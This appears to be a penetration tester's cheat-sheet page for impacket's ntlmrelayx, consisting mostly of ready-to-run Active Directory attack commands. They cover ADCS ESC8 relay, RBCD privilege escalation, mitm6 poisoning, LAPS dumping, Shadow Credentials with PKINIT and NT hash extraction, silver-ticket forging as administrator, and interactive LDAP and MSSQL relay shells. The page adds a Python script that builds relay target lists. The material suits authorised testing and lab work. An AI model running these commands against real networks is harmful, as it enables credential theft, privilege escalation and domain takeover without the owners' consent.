# ntlmrelayx.py

ntlmrelayx is part of impacket.
## Install

I usually use the embedded version in exegol, but that doesn't always play nice, so I like to go:

```bash
python3 -m venv venv
source venv/bin/activate
python3 -m pip install impacket
```

(Inside an activated venv you want `pip`, not `pipx`: pipx builds its own isolated environments and ignores the venv you just created.) Then just run things directly, like:

```bash
ntlmrelayx
```
## Logging output

```bash
ntlmrelayx YOUR-COMMANDS --output-file output.log
```

Note that `--output-file` (`-of`) is the base filename for the captured NetNTLM hashes (ntlmrelayx appends suffixes for NTLMv1 and NTLMv2), not a copy of the console log. If you want the console output as well, redirect or tee it yourself.
## Add date/timestamp to logs

Add `-ts` anywhere in the command to prefix every log line with a timestamp.
## Relaying with ADCS ESC8 attack

```bash
ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
```

This only works while the web enrollment endpoint accepts NTLM over plain HTTP without Extended Protection for Authentication. The template you request has to be one the relayed account can enroll in: `DomainController` when you relay a domain controller's machine account, `Machine` for an ordinary workstation or server account.
## Escalate privileges via relay

If you've already added a computer record to the environment (using something like powermad), you may be able to relay to LDAP and assign escalated privileges to that computer object! For example:

```bash
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
```

Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc! The coerced authentication needs to arrive over HTTP: SMB-originated NTLM negotiates signing and won't relay cleanly to LDAP, which is why WebClient matters here. `--delegate-access` writes RBCD (`msDS-AllowedToActOnBehalfOfOtherIdentity`) on the relayed machine so that your computer account can impersonate users to it.
## Delegate access attack while poisoning with mitm6

```bash
ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access
```

`-6` makes ntlmrelayx listen on IPv6 as well, and `-wh` is the (non-existent) WPAD host name it will hand out so that clients authenticate to the proxy; run mitm6 alongside this. Without `--escalate-user`, the attack creates a new computer account, so the domain's MachineAccountQuota must allow it. Relaying to `ldaps://` also depends on LDAP channel binding not being enforced on the DC.
## Setup SOCKS relay to a list of hosts

In this example we have a `targets.txt` file full of entries like this:

```
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
```

We set up the SOCKS relay like so:

```bash
ntlmrelayx.py -tf targets.txt -smb2support -socks
```
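Building that `targets.txt` by hand gets tedious past a handful of hosts. The following is an added example (not from the original page, and not part of impacket) that expands hostnames, single IPs and CIDR ranges into the `scheme://host` lines `-tf` expects, deduplicates them, and drops your own relay box so you never relay a victim back to yourself. The sample host list and the attacker address `1.2.3.6` are constructed for the demonstration:

```python
"""Build a targets file for ntlmrelayx -tf from hosts and CIDR ranges.

Added example, not part of the original page or of impacket. It assumes
only ntlmrelayx's documented target syntax (scheme://host, one per line).
"""
import ipaddress
from typing import Iterable, List


def build_targets(entries: Iterable[str], scheme: str = "smb",
                  exclude: Iterable[str] = ()) -> List[str]:
    """Expand hostnames, IPs and CIDRs into deduplicated 'scheme://host' lines.

    - CIDRs are expanded to their usable host addresses.
    - Addresses in `exclude` (e.g. the box running ntlmrelayx) are dropped.
    - Blank lines and '#' comments in the input are ignored.
    - Anything that is not an IP or CIDR is kept verbatim as a hostname.
    """
    excluded = {ipaddress.ip_address(a) for a in exclude}
    seen = set()
    lines: List[str] = []
    for raw in entries:
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        try:
            net = ipaddress.ip_network(entry, strict=False)
            # A bare address parses as a /32 (or /128): keep it as-is.
            hosts = [net.network_address] if net.num_addresses == 1 else list(net.hosts())
        except ValueError:
            hosts = [entry]  # not an IP/CIDR: treat as a hostname
        for host in hosts:
            if isinstance(host, (ipaddress.IPv4Address, ipaddress.IPv6Address)) and host in excluded:
                continue
            line = f"{scheme}://{host}"
            if line not in seen:
                seen.add(line)
                lines.append(line)
    return lines


# Constructed sample input: a /30, a duplicate of one of its hosts, a comment
# and a hostname. 1.2.3.6 plays the role of our own relay box.
SAMPLE_HOSTS = ["1.2.3.4/30", "1.2.3.5", "# our box is 1.2.3.6", "fileserver.domain.com", ""]
OUR_IP = "1.2.3.6"

if __name__ == "__main__":
    targets = build_targets(SAMPLE_HOSTS, scheme="smb", exclude=[OUR_IP])
    with open("targets.txt", "w") as fh:
        fh.write("\n".join(targets) + "\n")
    print("\n".join(targets))
```

Swap `scheme` for `ldap`, `mssql`, etc. when the relay target is something other than SMB; the rest of the file format is identical.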
## Dumping LAPS passwords

If you just want to set up a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify that you want to dump LAPS passwords:

```bash
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
```
## Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint Security.
### Find hosts with WebClient running

The webclientservicescanner works well for this.
### Add a rogue DNS record pointing to your machine

Try dnstool.py for this. Use a single-label name (no dots): the WebDAV client only sends NTLM automatically to hosts it considers part of the intranet zone, and a bare hostname qualifies while an arbitrary FQDN or IP does not.
### Setup relay for the Shadow Credentials attack

```bash
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
```

`--no-validate-privs` skips the pre-check of whether the relayed account can write `msDS-KeyCredentialLink` on the target, so a failed write only surfaces as an LDAP error in the output. On success ntlmrelayx saves the certificate as a PFX and prints the password it used; you need both in the next steps.
### Trigger HTTP auth from VICTIM$

Head to our coercer page for more info.
### Use the PFX to get a TGT

```bash
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass WHATEVER-PASS-IS domain.com/VICTIM$ cert.ccache
export KRB5CCNAME=cert.ccache
```

This will spit out a bunch of information including the AS-REP encryption key, which you can then use (together with the TGT now in `KRB5CCNAME`) to extract the NT hash of the machine via U2U:

```bash
getnthash.py -dc-ip IP.OF.A.DC -key XXXENCRYPTION KEY GOES HEREXXX domain.com/VICTIM$
```

With the NT hash, you can forge a silver ticket. First get the SID of the domain. Below is one way to get it: query the Administrator account's objectSid, which is the domain SID with the RID 500 appended. Just be sure that in the ticketer.py command that follows you remove the RID (the last `-500` component of the SID):

```bash
pywerview.py get-adobject -d domain.com -u lowpriv -p 'password' -t IP.OF.A.DOMAINCONTROLLER --sam-account-name administrator --attributes objectsid
```

Forge the ticket!

```bash
ticketer.py -domain domain.com -domain-sid xxxBE SURE TO LEAVE OFF THE RID!!!xxx -nthash yyy -spn cifs/VICTIMSYSTEM.domain.com administrator
```
## Shadow Credentials attack (with LDAP shell)

I followed these instructions to pwn the HTB machine Mist for this.
### Get a venv setup

```bash
python3 -m venv venv
source venv/bin/activate
```
### Install the appropriate impacket fork

```bash
git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
pip install setuptools
```
### Run ntlmrelayx with sudo permissions

```bash
sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -smb2support -t ldap://ip.of.a.dc -i
```

Root is needed to bind the SMB (445) and HTTP (80) listeners. `sudo` does not inherit the activated venv, which is why the venv's interpreter is called by its full path; the paths above assume you created the venv and cloned the fork from your home directory.
### Interact with the relay

```bash
nc 127.0.0.1 11000
```

ntlmrelayx logs the local port for each interactive session it opens (the first one is 11000, then counting up), so check the output if you have more than one relayed connection.
## Relay to MSSQL with interactive shell

```bash
ntlmrelayx -t mssql://192.168.7.7 -i -ts -smb2support
```

As with the LDAP shell, `-i` opens a local TCP port per relayed session (starting at 11000) that you connect to with `nc`.